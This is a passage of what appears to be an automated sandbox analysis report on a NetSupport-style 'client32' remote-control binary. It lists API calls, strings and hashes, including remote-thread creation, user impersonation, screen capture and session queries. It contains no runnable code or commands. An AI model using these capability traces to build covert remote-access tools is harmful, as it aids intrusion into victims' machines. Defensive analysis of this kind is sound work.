                                                                              • GetTickCount.KERNEL32 ref: 110EB64E
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                              • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                              • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                              • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                              • API String ID: 3451743168-2289091950
                                                                              • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                              • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                              • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(Kernel32), ref: 111261DA
                                                                              • GetCurrentProcess.KERNEL32(FFFFFFFF,001F0FFF,00000000,00000000), ref: 111261F6
                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 111261FD
                                                                              • DuplicateHandle.KERNEL32(00000000), ref: 11126200
                                                                              • GetExitCodeProcess.KERNEL32(FFFFFFFF,?), ref: 11126219
                                                                              • GetProcAddress.KERNEL32(00000000,ExitProcess), ref: 11126232
                                                                              • CreateRemoteThread.KERNEL32(FFFFFFFF,00000000,00000000,00000000,?,00000000,?), ref: 11126251
                                                                              • GetLastError.KERNEL32 ref: 1112625D
                                                                              • TerminateProcess.KERNEL32(?,?), ref: 11126268
                                                                              • CloseHandle.KERNEL32(FFFFFFFF), ref: 111262CF
                                                                              • SetLastError.KERNEL32(0000042B), ref: 111262DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$Handle$CurrentErrorLast$AddressCloseCodeCreateDuplicateExitModuleProcRemoteTerminateThread
                                                                              • String ID: ExitProcess$Kernel32
                                                                              • API String ID: 109174691-3456457508
                                                                              • Opcode ID: fabdeca340e6ff03c0eedb30f588ecf15a12367a9a7063cf99c13d5dcaf9420d
                                                                              • Instruction ID: 371920ae97de46759c1d7ed025a308ea72f9d8c42ad683334f98a63784c5ace3
                                                                              • Opcode Fuzzy Hash: fabdeca340e6ff03c0eedb30f588ecf15a12367a9a7063cf99c13d5dcaf9420d
                                                                              • Instruction Fuzzy Hash: 8431C075E40229EBDB158FE5CE88A9EFB78EF45724F110565FC20A3680D7709A00CBA0
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _memset.LIBCMT ref: 11136245
                                                                              • LoadIconA.USER32(00000000,00000455), ref: 11136313
                                                                              • _strncpy.LIBCMT ref: 11136335
                                                                              • Shell_NotifyIconA.SHELL32(00000000,000001E8,?,?,?,?,?,?,?,00000001,00000000,AB86ACF8,?,00000000,00000000), ref: 11136346
                                                                              • LoadIconA.USER32(00000000,0000045C), ref: 11136366
                                                                              • GetWindowTextA.USER32(00040270,?,00000180), ref: 11136388
                                                                              • wsprintfA.USER32 ref: 11136404
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              • wsprintfA.USER32 ref: 1113643C
                                                                              • wsprintfA.USER32 ref: 1113649D
                                                                              • wsprintfA.USER32 ref: 111364F8
                                                                              • Shell_NotifyIconA.SHELL32(11139E4B,000001E8,00000001,00000000,AB86ACF8,?,00000000,00000000), ref: 11136533
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Iconwsprintf$LoadNotifyShell_$TextWindow__wcstoi64_free_memset_strncpy
                                                                              • String ID: %s$%s%s$562258$Client$SysTray
                                                                              • API String ID: 1881589080-441279933
                                                                              • Opcode ID: 0a5c9f8dc402520b24d99fe5b39b65e0a073f3c8a151d53348388467c30159de
                                                                              • Instruction ID: abc8c5b323baaaa6f48eab0437aa75fb158c5b1e869706a0a7a2bf1e7c9e3741
                                                                              • Opcode Fuzzy Hash: 0a5c9f8dc402520b24d99fe5b39b65e0a073f3c8a151d53348388467c30159de
                                                                              • Instruction Fuzzy Hash: 8BA12B71D0422A9BD722CF64CD94BEAF7B8BB44719F1049ACE91D97284EB71AB44CF40
                                                                              APIs
                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 1102A245
                                                                                • Part of subcall function 110F70E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000), ref: 110F711B
                                                                                • Part of subcall function 110F70E0: GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 1102A2B8
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 1102A328
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 1102A3A2
                                                                              • FreeLibrary.KERNEL32(?), ref: 1102A3E7
                                                                                • Part of subcall function 110F7300: LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                • Part of subcall function 110F7300: GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                • Part of subcall function 110F7300: GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                • Part of subcall function 110F7300: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A3B7
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A3C1
                                                                              • wsprintfA.USER32 ref: 1102A4A7
                                                                              • wsprintfA.USER32 ref: 1102A4B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressLibraryProc$Load$ErrorFreeLastwsprintf$ComputerName
                                                                              • String ID: $%s%03d$%s%c%02d$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$hydrapark#
                                                                              • API String ID: 3908195755-3513858227
                                                                              • Opcode ID: 71ea406759e04b1339ccfb6e5b0de1db034c181def443d32a597bd66a3dfdd50
                                                                              • Instruction ID: f92ba7b4cbee429c5a8b04187c15bd0f656229ac2bc50c7fba354634dfeb625e
                                                                              • Opcode Fuzzy Hash: 71ea406759e04b1339ccfb6e5b0de1db034c181def443d32a597bd66a3dfdd50
                                                                              • Instruction Fuzzy Hash: 9A918F71D00269DFDB11CF649D84BDEFBB8BB49304F4045E9E459A7600EB71AA88CF51
                                                                              APIs
                                                                                • Part of subcall function 11001F80: FindWindowA.USER32(Progman,00000000), ref: 11001FA9
                                                                                • Part of subcall function 11001F80: GetWindowThreadProcessId.USER32(00000000,?), ref: 11001FB7
                                                                                • Part of subcall function 11001F80: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11001FCB
                                                                                • Part of subcall function 11001F80: GetVersionExA.KERNEL32(?), ref: 11001FE4
                                                                                • Part of subcall function 11001F80: OpenProcessToken.ADVAPI32(00000000,0002000B,00000000), ref: 11002000
                                                                                • Part of subcall function 11001F80: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 11002011
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 11002028
                                                                                • Part of subcall function 11001F80: CloseHandle.KERNEL32(00000000), ref: 1100202F
                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110023AD
                                                                              • CreateCompatibleDC.GDI32(?), ref: 110023BD
                                                                              • SelectObject.GDI32(00000000,?), ref: 110023D1
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11002401
                                                                              • _memset.LIBCMT ref: 11002419
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • GetSaveFileNameA.COMDLG32(00000058,?,?,?,AB86ACF8), ref: 110024A4
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11002518
                                                                              • SelectObject.GDI32(?,?), ref: 11002522
                                                                              • DeleteObject.GDI32(?), ref: 1100252F
                                                                              • DeleteDC.GDI32(?), ref: 11002536
                                                                              • EnableWindow.USER32(00000000,00000001), ref: 1100255F
                                                                              • RevertToSelf.ADVAPI32(?,?,?,AB86ACF8), ref: 11002561
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ObjectProcess$CloseCompatibleCreateDeleteEnableFileFolderHandleNameOpenPathSelect$BitmapFindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion_memset
                                                                              • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3362589479-2539113696
                                                                              • Opcode ID: f9d947188d7d45801c45cae65f9b05fc20ab652966aa13b62964c56aad9f169a
                                                                              • Instruction ID: 9d3051af6559d4f2dd0c7a1e2ead35f12597f10354149e4796aa47e8d90882b9
                                                                              • Opcode Fuzzy Hash: f9d947188d7d45801c45cae65f9b05fc20ab652966aa13b62964c56aad9f169a
                                                                              • Instruction Fuzzy Hash: 4D51A175E40319AFEB24CF60CC85FEAB7B8FB49748F0045A9E529A7680DB74A940CF51
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s%s$Client$DecompressJPEGToBitmap$DecompressPNGToBitmap$ImageFile$ImageFileUser$PCIImage.dll
                                                                              • API String ID: 2111968516-1286714176
                                                                              • Opcode ID: 5a0a596aa89e9b017834500dd1e75b12524007687034fc42cfb07ef4cc1a64f6
                                                                              • Instruction ID: 02765b2c7a6772d971fa9da819da4de0b757c726f9e67794902461bd1f2e2486
                                                                              • Opcode Fuzzy Hash: 5a0a596aa89e9b017834500dd1e75b12524007687034fc42cfb07ef4cc1a64f6
                                                                              • Instruction Fuzzy Hash: 70913935A503199FE721DFA4CD84FDAF3B4BB88725F1041A8EA19A7284DB70AA40CF51
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1104702F
                                                                              • wsprintfA.USER32 ref: 110470AE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • wsprintfA.USER32 ref: 110470E9
                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                              • _strrchr.LIBCMT ref: 1104720C
                                                                              • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                              • _free.LIBCMT ref: 11047251
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                              • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                              • API String ID: 1757445300-1785190265
                                                                              • Opcode ID: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                              • Opcode Fuzzy Hash: 8df59efd58386d5d632d4f9a1d1019fa2f1450115bc2f61edf1bae4acd3b0bfd
                                                                              • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000002), ref: 1101E216
                                                                                • Part of subcall function 110CE050: GetWindowRect.USER32(00000000,?), ref: 110CE0C5
                                                                                • Part of subcall function 110CE050: GetClientRect.USER32(00000000,?), ref: 110CE0F8
                                                                                • Part of subcall function 110CE050: GetWindowRect.USER32(?,?), ref: 110CE103
                                                                              • GetDlgItem.USER32(?,000013B2), ref: 1101E22E
                                                                              • GetDlgItem.USER32(?,000017DD), ref: 1101E243
                                                                              • GetDlgItem.USER32(?,000013A9), ref: 1101E258
                                                                              • GetDlgItem.USER32(?,?), ref: 1101E26F
                                                                              • GetDlgItem.USER32(?,000013A2), ref: 1101E284
                                                                              • GetDlgItem.USER32(?,000013A4), ref: 1101E299
                                                                              • GetDlgItem.USER32(?,0000139C), ref: 1101E2AE
                                                                              • GetDlgItem.USER32(?,0000139D), ref: 1101E2C3
                                                                              • GetDlgItem.USER32(?,0000139F), ref: 1101E2D8
                                                                              • GetDlgItem.USER32(?,000013AB), ref: 1101E2ED
                                                                              • GetDlgItem.USER32(?,000013B1), ref: 1101E302
                                                                              • GetDlgItem.USER32(?,000013C2), ref: 1101E317
                                                                              • GetDlgItem.USER32(?,000013C3), ref: 1101E32C
                                                                              • GetDlgItem.USER32(?,000013BE), ref: 1101E341
                                                                              • GetDlgItem.USER32(?,000013CA), ref: 1101E356
                                                                              • GetDlgItem.USER32(?,000013C7), ref: 1101E36B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$Rect$Window$Client
                                                                              • String ID:
                                                                              • API String ID: 3380545214-0
                                                                              APIs
                                                                              • ReleaseDC.USER32(00000000,?), ref: 11006267
                                                                              • InflateRect.USER32(?,?,?), ref: 11006306
                                                                              • SelectObject.GDI32(?,?), ref: 1100632D
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 110063D5
                                                                              • LineTo.GDI32(?,?,?), ref: 11006410
                                                                              • Polygon.GDI32(?,?,00000003), ref: 110064C8
                                                                              • SelectObject.GDI32(?,?), ref: 110064DC
                                                                              • SelectObject.GDI32(?,?), ref: 110064E6
                                                                              • InflateRect.USER32(?,?,?), ref: 11006522
                                                                              • SelectObject.GDI32(?,?), ref: 1100633D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetDC.USER32(00000000), ref: 11006569
                                                                                • Part of subcall function 11002620: SetROP2.GDI32(?,00000007), ref: 11002631
                                                                                • Part of subcall function 11002620: SelectObject.GDI32(?,?), ref: 11002642
                                                                                • Part of subcall function 11002620: MoveToEx.GDI32(?,?,?,00000000), ref: 110026AF
                                                                                • Part of subcall function 11002620: LineTo.GDI32(?,00000000,?), ref: 110026E6
                                                                              • __floor_pentium4.LIBCMT ref: 11006621
                                                                              Similarity
                                                                              • API ID: ObjectSelect$InflateLineMoveRect$ErrorExitLastMessagePolygonProcessRelease__floor_pentium4wsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 4043586968-2830328467
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 1103C1EF
                                                                              • Sleep.KERNEL32(000001F4), ref: 1103C234
                                                                              • PostMessageA.USER32(00040270,00000010,00000000,00000000), ref: 1103C25F
                                                                              Similarity
                                                                              • API ID: CountMessagePostSleepTick
                                                                              • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                              • API String ID: 507213284-4185502373
                                                                              APIs
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                              • _free.LIBCMT ref: 1112131D
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 11121333
                                                                              • _free.LIBCMT ref: 11121348
                                                                              • GdiFlush.GDI32(?,?,?,01578E40), ref: 11121350
                                                                              • _free.LIBCMT ref: 1112135D
                                                                              • _free.LIBCMT ref: 11121371
                                                                              • SelectObject.GDI32(?,?), ref: 1112138D
                                                                              • DeleteObject.GDI32(?), ref: 1112139A
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,01578E40), ref: 111213A4
                                                                              • DeleteDC.GDI32(?), ref: 111213CB
                                                                              • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                              • DeleteDC.GDI32(?), ref: 111213EB
                                                                              • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                              Strings
                                                                              • Error deleting membm, e=%d, xrefs: 111213AB
                                                                              Similarity
                                                                              • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                              • String ID: Error deleting membm, e=%d
                                                                              • API String ID: 3195047866-709490903
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                              • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                              • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                              • API String ID: 4172769820-2231854162
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000017D,AB86ACF8,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                              • _memset.LIBCMT ref: 1110F4C2
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                              • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                              • _free.LIBCMT ref: 1110F628
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                              • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                              • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,AB86ACF8,0000017D,00000001), ref: 1110F681
                                                                              Similarity
                                                                              • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                              • String ID: End Record %s$PCIR
                                                                              • API String ID: 4278564793-2672865668
                                                                              • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                              • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                              • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1103C396
                                                                              • _free.LIBCMT ref: 1103C490
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                              • _calloc.LIBCMT ref: 1103C4A5
                                                                              • _free.LIBCMT ref: 1103C4E0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _calloc_freewsprintf$CreateDialogErrorLastParam_malloc_memset
                                                                              • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                              • API String ID: 1372014042-1552251038
                                                                              • Opcode ID: 72b7735d7667b6ec302ef8ca0014c817d3edac096f2fed806ed12241bd93b09b
                                                                              • Instruction ID: cdac1be2d741978c3eef80f3bcdc0ac73d985042abc912fef0ab0d71eb78c2cc
                                                                              • Opcode Fuzzy Hash: 72b7735d7667b6ec302ef8ca0014c817d3edac096f2fed806ed12241bd93b09b
                                                                              • Instruction Fuzzy Hash: 77612475E41326AFEB10DFA4CDC1FADB3A4AB85709F10426AE6169B3C0EB716940C791
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,AB86ACF8,1102E747,?,00000000), ref: 110F711B
                                                                              • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                              • wsprintfA.USER32 ref: 110F7235
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                              • wsprintfA.USER32 ref: 110F7267
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                              • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                              • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                              • API String ID: 856016564-3838485836
                                                                              • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                              • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                              • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                              APIs
                                                                              • IsValidSid.ADVAPI32(?,?,?), ref: 110F230B
                                                                              • GetSidIdentifierAuthority.ADVAPI32(?,?), ref: 110F231C
                                                                              • GetSidSubAuthorityCount.ADVAPI32(?), ref: 110F2325
                                                                              • SetLastError.KERNEL32(0000007A), ref: 110F2346
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Authority$CountErrorIdentifierLastValid
                                                                              • String ID: %lu$-%lu$0x%02hx%02hx%02hx%02hx%02hx%02hx$S-%lu-
                                                                              • API String ID: 228009767-531523367
                                                                              • Opcode ID: 57a6488dd8bcfc92baea919205bc7f2fa72d0bc6c6c6a664b58e8be8880b9895
                                                                              • Instruction ID: 492306157e7ec18f2a05f9c3a54debd260959543ed90ab263cae37764b9c0b6d
                                                                              • Opcode Fuzzy Hash: 57a6488dd8bcfc92baea919205bc7f2fa72d0bc6c6c6a664b58e8be8880b9895
                                                                              • Instruction Fuzzy Hash: EA417EB19041659BC719CF7D8CA99EAFFF5EF86205708C5BAF4E687200F538D5088760
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                              • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
